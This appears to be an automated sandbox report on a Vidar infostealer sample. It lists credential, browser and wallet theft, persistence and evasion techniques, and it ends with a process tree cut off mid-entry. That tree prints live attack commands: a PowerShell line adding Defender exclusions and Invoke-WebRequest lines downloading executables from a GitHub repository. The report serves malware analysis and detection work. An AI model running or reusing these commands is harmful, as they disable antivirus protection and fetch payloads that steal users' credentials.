vidar | 39b8d89f49c86b2a1f876763e3b4666749c85de715aa10aa96a00d5a2d83861a

pid	Process
5020	msedge.exe
4640	chrome.exe
3476	chrome.exe
4984	chrome.exe
2120	chrome.exe
4920	chrome.exe
1468	chrome.exe
6008	msedge.exe
5832	chrome.exe
448	chrome.exe
5564	chrome.exe
5868	chrome.exe
5536	chrome.exe
5452	chrome.exe
5172	chrome.exe
3148	chrome.exe
2044	chrome.exe
32	chrome.exe
4044	chrome.exe
4948	msedge.exe
1844	chrome.exe
700	chrome.exe
5848	chrome.exe
4212	chrome.exe
2864	chrome.exe
880	msedge.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	S0FTWARE.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	aaccaa.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	service.exe
Key value queried	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation	S0FTWARE.exe

Executes dropped EXE 8 IoCs

pid	Process
2928	S0FTWARE.exe
3868	gjgxitnlso.exe
4696	aaccaa.exe
4496	opigwliiren.exe
2192	service.exe
3336	S0FTWARE.exe
4332	Updater.exe
5076	kbfkegxz.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs

Web Service

T1102

flow	ioc
263	raw.githubusercontent.com
27	raw.githubusercontent.com
43	raw.githubusercontent.com
239	raw.githubusercontent.com
28	raw.githubusercontent.com
34	raw.githubusercontent.com
272	raw.githubusercontent.com
204	raw.githubusercontent.com
206	pastebin.com
207	pastebin.com
213	raw.githubusercontent.com
257	raw.githubusercontent.com
280	raw.githubusercontent.com
205	raw.githubusercontent.com
278	raw.githubusercontent.com
289	raw.githubusercontent.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3380	powercfg.exe
6000	powercfg.exe
2220	powercfg.exe
1000	powercfg.exe
332	powercfg.exe
4348	powercfg.exe
2880	powercfg.exe
5664	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe
File opened for modification	C:\Windows\system32\MRT.exe	opigwliiren.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4332 set thread context of 5012	4332	Updater.exe	197
PID 4332 set thread context of 2664	4332	Updater.exe	199

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2664-857-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-860-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-862-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-863-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-869-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-867-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-866-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-865-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-868-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-861-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-859-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-858-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-1126-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/2664-1127-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5688	sc.exe
5748	sc.exe
3528	sc.exe
2152	sc.exe
3600	sc.exe
5868	sc.exe
5820	sc.exe
3204	sc.exe
512	sc.exe
2700	sc.exe
1584	sc.exe
4292	sc.exe
2100	sc.exe
3392	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aaccaa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gjgxitnlso.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	kbfkegxz.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	gjgxitnlso.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	gjgxitnlso.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4048	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 52 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	explorer.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133897018153167803"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5352	schtasks.exe
3204	schtasks.exe
3588	schtasks.exe
5032	schtasks.exe
3020	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4736	powershell.exe
4736	powershell.exe
4736	powershell.exe
3588	powershell.exe
3588	powershell.exe
3588	powershell.exe
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
4496	opigwliiren.exe
6108	powershell.exe
6108	powershell.exe
6108	powershell.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
3868	gjgxitnlso.exe
3868	gjgxitnlso.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4496	opigwliiren.exe
4332	Updater.exe
3020	powershell.exe
3020	powershell.exe
3020	powershell.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
4332	Updater.exe
436	powershell.exe
436	powershell.exe
436	powershell.exe
5264	powershell.exe
5264	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2328	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5020	msedge.exe
5020	msedge.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeRestorePrivilege	2328	7zFM.exe
Token: 35	2328	7zFM.exe
Token: SeSecurityPrivilege	2328	7zFM.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	3588	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeShutdownPrivilege	5536	chrome.exe
Token: SeCreatePagefilePrivilege	5536	chrome.exe
Token: SeSecurityPrivilege	2328	7zFM.exe
Token: SeDebugPrivilege	6108	powershell.exe
Token: SeShutdownPrivilege	2220	powercfg.exe
Token: SeCreatePagefilePrivilege	2220	powercfg.exe
Token: SeShutdownPrivilege	5664	powercfg.exe
Token: SeCreatePagefilePrivilege	5664	powercfg.exe
Token: SeShutdownPrivilege	6000	powercfg.exe
Token: SeCreatePagefilePrivilege	6000	powercfg.exe
Token: SeShutdownPrivilege	3380	powercfg.exe
Token: SeCreatePagefilePrivilege	3380	powercfg.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeLockMemoryPrivilege	2664	explorer.exe
Token: SeShutdownPrivilege	2880	powercfg.exe
Token: SeCreatePagefilePrivilege	2880	powercfg.exe
Token: SeShutdownPrivilege	1000	powercfg.exe
Token: SeCreatePagefilePrivilege	1000	powercfg.exe
Token: SeShutdownPrivilege	332	powercfg.exe
Token: SeCreatePagefilePrivilege	332	powercfg.exe
Token: SeShutdownPrivilege	4348	powercfg.exe
Token: SeCreatePagefilePrivilege	4348	powercfg.exe
Token: SeDebugPrivilege	436	powershell.exe
Token: SeDebugPrivilege	5264	powershell.exe
Token: SeDebugPrivilege	5860	powershell.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
2328	7zFM.exe
2328	7zFM.exe
2328	7zFM.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
5536	chrome.exe
2328	7zFM.exe
5020	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2928	2328	7zFM.exe	95
PID 2328 wrote to memory of 2928	2328	7zFM.exe	95
PID 2928 wrote to memory of 4628	2928	S0FTWARE.exe	98
PID 2928 wrote to memory of 4628	2928	S0FTWARE.exe	98
PID 4628 wrote to memory of 4736	4628	cmd.exe	99
PID 4628 wrote to memory of 4736	4628	cmd.exe	99
PID 2928 wrote to memory of 3412	2928	S0FTWARE.exe	100
PID 2928 wrote to memory of 3412	2928	S0FTWARE.exe	100
PID 3412 wrote to memory of 3588	3412	cmd.exe	101
PID 3412 wrote to memory of 3588	3412	cmd.exe	101
PID 2928 wrote to memory of 5404	2928	S0FTWARE.exe	102
PID 2928 wrote to memory of 5404	2928	S0FTWARE.exe	102
PID 5404 wrote to memory of 5092	5404	cmd.exe	103
PID 5404 wrote to memory of 5092	5404	cmd.exe	103
PID 2928 wrote to memory of 3868	2928	S0FTWARE.exe	104
PID 2928 wrote to memory of 3868	2928	S0FTWARE.exe	104
PID 2928 wrote to memory of 3868	2928	S0FTWARE.exe	104
PID 2928 wrote to memory of 4384	2928	S0FTWARE.exe	105
PID 2928 wrote to memory of 4384	2928	S0FTWARE.exe	105
PID 4384 wrote to memory of 4880	4384	cmd.exe	106
PID 4384 wrote to memory of 4880	4384	cmd.exe	106
PID 2928 wrote to memory of 4696	2928	S0FTWARE.exe	107
PID 2928 wrote to memory of 4696	2928	S0FTWARE.exe	107
PID 2928 wrote to memory of 4696	2928	S0FTWARE.exe	107
PID 4696 wrote to memory of 5660	4696	aaccaa.exe	108
PID 4696 wrote to memory of 5660	4696	aaccaa.exe	108
PID 4696 wrote to memory of 5660	4696	aaccaa.exe	108
PID 5660 wrote to memory of 3204	5660	cmd.exe	110
PID 5660 wrote to memory of 3204	5660	cmd.exe	110
PID 5660 wrote to memory of 3204	5660	cmd.exe	110
PID 3868 wrote to memory of 5536	3868	gjgxitnlso.exe	112
PID 3868 wrote to memory of 5536	3868	gjgxitnlso.exe	112
PID 5536 wrote to memory of 768	5536	chrome.exe	113
PID 5536 wrote to memory of 768	5536	chrome.exe	113
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114
PID 5536 wrote to memory of 3980	5536	chrome.exe	114

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Iаuncher_v9.1.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Users\Admin\AppData\Local\Temp\7zO8193B2E7\S0FTWARE.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO8193B2E7\S0FTWARE.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\glrfnz', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4628
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\glrfnz', 'C:\Users', 'C:\ProgramData'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\glrfnz\aaccaa.exe'"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5092
- - C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe
    "C:\Users\Admin\AppData\Local\glrfnz\gjgxitnlso.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:5536
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffbc9dbdcf8,0x7ffbc9dbdd04,0x7ffbc9dbdd10
        5⤵
        
        PID:768
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1876,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1852 /prefetch:2
        5⤵
        
        PID:3980
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2256,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2280 /prefetch:3
        5⤵
        
        PID:1576
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2400,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2380 /prefetch:8
        5⤵
        
        PID:2448
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3244,i,15338201237059528268,7430872768120509324,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3264 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4044
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
